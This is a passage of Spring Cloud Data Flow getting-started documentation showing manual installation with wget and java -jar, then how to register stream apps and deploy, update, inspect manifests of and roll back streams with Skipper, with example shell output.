following:\n\n====\n[source,yaml,subs=attributes]\n----\n dataflow-server:\n .........\n volumes:\n - ~\/.m2:\/root\/.m2\n----\n====\n\nNow you can use the `maven:\/\/` URI schema and Maven coordinates to resolve jars installed in the host's maven repository, as the following example shows:\n\n====\n[source,bash,subs=attributes]\n----\ndataflow:>app register --type processor --name pose-estimation --uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:2.0.2.BUILD-SNAPSHOT --metadata-uri maven:\/\/org.springframework.cloud.stream.app:pose-estimation-processor-rabbit:jar:metadata:2.0.2.BUILD-SNAPSHOT\n----\n====\n\nThis approach lets you share jars that are built and installed on the host machine (for example, by using `mvn clean install`) directly with the dataflow-server container.\n\nYou can also pre-register the apps directly in the docker-compose. For every pre-registered app starer, add an additional `wget` statement to the `app-import` block configuration, as the following example shows:\n\n====\n[source,yaml,subs=attributes]\n----\n app-import:\n image: alpine:3.7\n command: >\n \/bin\/sh -c \"\n ....\n wget -qO- 'http:\/\/dataflow-server:9393\/apps\/source\/my-app' --post-data='uri=file:\/root\/apps\/my-app.jar&metadata-uri=file:\/root\/apps\/my-app-metadata.jar';\n echo 'My custom apps imported'\"\n----\n====\n\nSee the https:\/\/docs.spring.io\/spring-cloud-dataflow\/docs\/current\/reference\/htmlsingle\/#resources-registered-applications[SCDF REST API] for further details.\n\n\n\n[[getting-started-local-deploying-spring-cloud-dataflow]]\n=== Getting Started with Manual Installation\n\nIf Docker does not suit your needs, you can manually install the parts you need to run Spring Cloud Data Flow. To do so:\n\n. Download the Spring Cloud Data Flow Server by using the following command:\n+\n====\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-server\/{project-version}\/spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n\n. Download the Spring Cloud Data Flow Shell application by using the following command:\n+\n====\n[source,bash,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\n. If you need to enable Stream features, download http:\/\/cloud.spring.io\/spring-cloud-skipper\/[Skipper] (because Data Flow delegates to Skipper for those features), by running the following commands:\n+\n====\n[source,yaml,options=nowrap,subs=attributes]\n----\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-server\/{skipper-version}\/spring-cloud-skipper-server-{skipper-version}.jar\n\nwget https:\/\/repo.spring.io\/{skipper-version-type-lowercase}\/org\/springframework\/cloud\/spring-cloud-skipper-shell\/{skipper-version}\/spring-cloud-skipper-shell-{skipper-version}.jar\n----\n====\n\nIMPORTANT: These instructions require that RabbitMQ be running on the same machine as Skipper and the Spring Cloud Data Flow server and shell.\n\n. Launch Skipper (required unless the Stream features are disabled and the Spring Cloud Data Flow runs in Task mode only). To do so, in the directory where you downloaded Skipper, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-skipper-server-{skipper-version}.jar\n----\n====\n\n. Launch the Data Flow Server\n+\nIn a different terminal window and in the directory where you downloaded Data Flow, run the server by using `java -jar`, as follows:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar\n----\n====\n+\nIf Skipper and the Data Flow server are not running on the same host, set the `spring.cloud.skipper.client.serverUri` configuration property to the location of Skipper, as shown in the following example\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-{project-version}.jar --spring.cloud.skipper.client.serverUri=http:\/\/192.51.100.1:7577\/api\n----\n====\n\n. In another terminal window, launch the Data Flow Shell by running the following command:\n+\n====\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n====\n\nIf the Data Flow Server and shell are not running on the same host, you can also point the shell to the Data Flow server URL by using the `dataflow config server` command when in the shell's interactive mode.\n\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server URL, as the following example shows:\n\n====\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/198.51.100.0\nSuccessfully targeted http:\/\/198.51.100.0\ndataflow:>\n----\n====\n\nAlternatively, you can pass in the `--dataflow.uri` command line option. The shell's `--help` command line option shows what is available.\n\nIMPORTANT: If you run Spring Cloud Data Flow Server behind a proxy server (such as\nhttps:\/\/github.com\/Netflix\/zuul[Zuul]), you may also need to set the\n`server.use-forward-headers` property to `true`. An example that uses Zuul is available in the\nhttps:\/\/github.com\/spring-cloud\/spring-cloud-dataflow-samples\/tree\/master\/dataflow-zuul[Spring Cloud Data Flow Samples repository]\non GitHub. Additional information is also available in the\nhttps:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/htmlsingle\/#howto-use-tomcat-behind-a-proxy-server[Spring Boot Reference Guide].\n\n[[getting-started-local-deploying-streams-spring-cloud-dataflow]]\n=== Deploying Streams\n\nDeploying streams requires that you first register some stream applications. By default, the application registry is empty.\nAs an example, register two applications, `http` and `log`, that communicate by using RabbitMQ. To do so, run the following commands:\n\n====\n[source,bash]\n----\ndataflow:>app register --name http --type source --uri maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'source:http'\n\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.1.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nFor more details, such as how to register applications that are based on Docker containers or use Kafka as the messaging middleware, see the section on how to <<streams.adoc#spring-cloud-dataflow-register-stream-apps, register applications>>.\n\nNOTE: Depending on your environment, you may need to configure the Data Flow Server to point to a custom\nMaven repository location or configure proxy settings. See <<configuration-maven>> for more information.\n\nNow that you have stream applications, you can create a stream. To do so, use the following `stream create` command to create a stream with a `http` source and a `log` sink and deploy it:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n====\n\nNOTE: You need to wait a little while, until the apps are actually deployed successfully, before posting data.\nYou can look in the log file of the Skipper server for the location of the log files for the `http` and `log` applications.\nYou can use the `tail` command on the log file for each application to verify that the application has started.\n\nOnce the stream has started, you can post some data, as shown in the following example:\n\n====\n[source,bash]\n----\ndataflow:>http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\n====\n\nNow you should check to see if `hello world` ended up in log files for the `log` application.\nThe location of the log file for the `log` application appears in the Data Flow server's log.\n\nNOTE: When deploying locally, each app (and each app instance, in case of `count > 1`) gets a dynamically assigned `server.port`, unless you explicitly assign one with `--server.port=x`.\nIn both cases, this setting is propagated as a configuration property that overrides any lower-level setting that you may have used (for example, in `application.yml` files).\n\nThe following sections show how to update and roll back streams by using the Local Data Flow server and Skipper.\nIf you run the Unix `jps` command, you can see the two Java processes running, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n12643 log-sink-rabbit-1.1.0.RELEASE.jar\n12645 http-source-rabbit-1.2.0.RELEASE.jar\n----\n====\n\n[[getting-started-local-spring-cloud-dataflow-streams-upgrading]]\n==== Upgrading\n\nBefore we start upgrading the log-sink version to 1.2.0.RELEASE, we have to register that version in the app registry.\nThe following command does so:\n\n====\n[source,bash]\n----\ndataflow:>app register --name log --type sink --uri maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:1.2.0.RELEASE\nSuccessfully registered application 'sink:log'\n----\n====\n\nSince we are using the local server, we need to set the port to a different value (9002) than the currently running log sink's value of 9000 to avoid a conflict.\nWhile we are at it, we update the log level to `ERROR`.\nTo do so, we create a YAML file, named `local-log-update.yml`, with the following contents:\n\n====\n[source,yml]\n----\nversion:\n log: 1.2.0.RELEASE\napp:\n log:\n server.port: 9002\n log.level: ERROR\n----\n====\n\nNow we can update the stream, as follows:\n\n====\n[source,bash]\n----\ndataflow:> stream update --name httptest --propertiesFile \/home\/mpollack\/local-log-update.yml\nUpdate request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is version 1.2.0.RELEASE, as shown in the following listing:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n22031 log-sink-rabbit-1.1.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file of the Skipper server.\nTo do so, use the following commands (note that the directory names may not exactly match this example, because the numeric prefix changes):\n\n====\n[source,bash]\n----\ncd \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\ntail -f stdout_0.log\n----\n====\n\nYou should see log entries similar to the following:\n\n====\n[source,bash,options=nowrap]\n----\nINFO 12591 --- [ StateUpdate-1] o.s.c.d.spi.local.LocalAppDeployer : Deploying app with deploymentId httptest.log-v2 instance 0.\n Logs will be in \/tmp\/spring-cloud-dataflow-5262910238261867964\/httptest-1511749222274\/httptest.log-v2\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.strategies.HealthCheckStep : Waiting for apps in release httptest-v2 to be healthy.\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Release httptest-v2 has been DEPLOYED\nINFO 12591 --- [ StateUpdate-1] o.s.c.s.s.d.s.HandleHealthCheckStep : Apps in release httptest-v2 are healthy.\n----\n====\n\nNow you can post a message to the http source at port `9000`, as follows:\n\n====\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world upgraded\"\n----\n====\n\nThe log message is now at the error level, as shown in the following example:\n\n====\n[source,bash]\n----\nERROR 22311 --- [http.httptest-1] log-sink : hello world upgraded\n----\n====\n\nIf you query the `\/info` endpoint of the application, you can also see that it is at version `1.2.0.RELEASE`, as shown in the following example:\n\n====\n[source,bash]\n----\n$ curl http:\/\/localhost:9002\/info\n{\"app\":{\"description\":\"Spring Cloud Stream Log Sink Rabbit Binder Application\",\"name\":\"log-sink-rabbit\",\"version\":\"1.2.0.RELEASE\"}}\n----\n====\n\n===== Forcing the Upgrade of a Stream\n\nWhen upgrading a stream, you can use the `--force` option to deploy new instances of currently deployed applications even if no application or deployment properties have changed.\nThis behavior is needed when configuration information is obtained by the application itself at startup time -- for example, from Spring Cloud Config Server.\nYou can specify which applications to force upgrade by using the `--app-names` option.\nIf you do not specify any application names, all the applications are force upgraded.\nYou can specify the `--force` and `--app-names` options together with `--properties` or `--propertiesFile` the options.\n\n===== Overriding Properties During Stream Update\n\nThe properties that are passed during stream update are added on top of the existing properties for the same stream.\n\nFor instance, the `ticktock` stream is deployed without any explicit properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream create --name ticktock --definition \"time | log --name=mylogger\"\nCreated new stream 'ticktock'\n\ndataflow:>stream deploy --name ticktock\nDeployment request has been sent for stream 'ticktock'\n----\n====\n\nYou can view the manifest for the `ticktock` stream by using the `stream manifest` command, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n====\n\nIn the second update, we try to add a new property for a `log` application called `foo2=bar2`, as the following example shows:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo2=bar2\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" \/\/ <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n\ndataflow:>stream list\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Stream Name\u2502 Stream Definition \u2502 Status \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u2551ticktock \u2502time | log --log.name=mylogger --foo2=bar2\u2502The stream has been successfully deployed\u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\n----\n\n<1> Property `foo2=bar2` is applied for the `log` application.\n====\n\nNow, when we add another property `foo3=bar3` to the `log` application, this new property is added on top of the existing properties for the stream `ticktock`. The following example shows the command to do so and the result:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar3\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest --name ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar3\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3=bar3` is added along with the existing `foo2=bar2` for the `log` application.\n====\n\nWe can still override the existing properties, as follows:\n\n====\n[source,bash]\n----\ndataflow:>stream update --name ticktock --properties app.log.foo3=bar4\nUpdate request has been sent for the stream 'ticktock'\n\ndataflow:>stream manifest ticktock\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"time\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:time-source-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"time\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.time.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.output.producer.requiredGroups\": \"ticktock\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.stream.bindings.output.destination\": \"ticktock.time\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"source\"\n \"deploymentProperties\":\n \"spring.cloud.deployer.group\": \"ticktock\"\n---\n\"apiVersion\": \"skipper.spring.io\/v1\"\n\"kind\": \"SpringCloudDeployerApplication\"\n\"metadata\":\n \"name\": \"log\"\n\"spec\":\n \"resource\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\"\n \"resourceMetadata\": \"maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit:jar:metadata:1.3.1.RELEASE\"\n \"version\": \"1.3.1.RELEASE\"\n \"applicationProperties\":\n \"spring.metrics.export.triggers.application.includes\": \"integration**\"\n \"spring.cloud.dataflow.stream.app.label\": \"log\"\n \"spring.cloud.stream.metrics.key\": \"ticktock.log.${spring.cloud.application.guid}\"\n \"spring.cloud.stream.bindings.input.group\": \"ticktock\"\n \"log.name\": \"mylogger\"\n \"spring.cloud.stream.metrics.properties\": \"spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\"\n \"spring.cloud.dataflow.stream.name\": \"ticktock\"\n \"spring.cloud.dataflow.stream.app.type\": \"sink\"\n \"foo2\": \"bar2\" <1>\n \"spring.cloud.stream.bindings.input.destination\": \"ticktock.time\"\n \"foo3\": \"bar4\" <1>\n \"deploymentProperties\":\n \"spring.cloud.deployer.count\": \"1\"\n \"spring.cloud.deployer.group\": \"ticktock\"\n----\n\n<1> The property `foo3` is replaced with the new value` bar4` and the existing property `foo2=bar2` remains.\n====\n\n===== Stream History\n\nYou can view the history of a stream by running the `stream history` command, as shown (with its output), in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream history --name httptest\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2564\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2551Version\u2502 Last updated \u2502 Status \u2502Package Name\u2502Package Version\u2502 Description \u2551\n\u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u256a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563\n\u25512 \u2502Mon Nov 27 22:41:16 EST 2017\u2502DEPLOYED\u2502httptest \u25021.0.0 \u2502Upgrade complete\u2551\n\u25511 \u2502Mon Nov 27 22:40:41 EST 2017\u2502DELETED \u2502httptest \u25021.0.0 \u2502Delete complete \u2551\n\u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2567\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n----\n====\n\n===== Stream Manifest\n\nThe manifest is a YAML document that represents the final state of what was deployed to the platform.\nYou can view the manifest for any stream version by using the `stream manifest --name <name-of-stream> --releaseVersion <optional-version>` command.\nIf the `--releaseVersion` is not specified, the manifest for the last version is returned.\nThe following listing shows a typical `stream manifest` command and its output:\n\n====\n[source,bash]\n----\ndataflow:>stream manifest --name httptest\n\n---\n# Source: log.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: log\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:log-sink-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: log\n spring.cloud.stream.metrics.key: httptest.log.${spring.cloud.application.guid}\n spring.cloud.stream.bindings.input.group: httptest\n spring.cloud.stream.metrics.properties: spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: sink\n spring.cloud.stream.bindings.input.destination: httptest.http\n deploymentProperties:\n spring.cloud.deployer.indexed: true\n spring.cloud.deployer.group: httptest\n spring.cloud.deployer.count: 1\n\n---\n# Source: http.yml\napiVersion: skipper.spring.io\/v1\nkind: SpringCloudDeployerApplication\nmetadata:\n name: http\nspec:\n resource: maven:\/\/org.springframework.cloud.stream.app:http-source-rabbit\n version: 1.2.0.RELEASE\n applicationProperties:\n spring.metrics.export.triggers.application.includes: integration**\n spring.cloud.dataflow.stream.app.label: http\n spring.cloud.stream.metrics.key: httptest.http.${spring.cloud.application.guid}\n spring.cloud.stream.bindings.output.producer.requiredGroups: httptest\n spring.cloud.stream.metrics.properties: spring.application.name,spring.application.index,spring.cloud.application.*,spring.cloud.dataflow.*\n server.port: 9000\n spring.cloud.stream.bindings.output.destination: httptest.http\n spring.cloud.dataflow.stream.name: httptest\n spring.cloud.dataflow.stream.app.type: source\n deploymentProperties:\n spring.cloud.deployer.group: httptest\n----\n====\n\nThe majority of the deployment and application properties were set by Data Flow in order to enable the applications to talk to each other and send application metrics with identifying labels.\n\nIf you compare this YAML document to the one for `--releaseVersion=1`, you can see the difference in the log application version.\n\n[[getting-started-local-streams-rollback]]\n==== Rolling Back\n\nTo go back to the previous version of the stream, you can use the `stream rollback` command, as shown (with its output) in the following example:\n\n====\n[source,bash]\n----\ndataflow:>stream rollback --name httptest\nRollback request has been sent for the stream 'httptest'\n----\n====\n\nBy running the Unix `jps` command, you can see the two Java processes running, but now the log application is back to 1.1.0.RELEASE.\nThe `http` source process remains unchanged.\nThe following listing shows the `jps` command and typical output:\n\n====\n[source,bash]\n----\n$ jps | grep rabbit\n22034 http-source-rabbit-1.2.0.RELEASE.jar\n23939 log-sink-rabbit-1.1.0.RELEASE.jar\n----\n====\n\nNow you can look in the log file for the skipper server, by using the following commands:\n\n====\n[source,bash]\n----\ncd 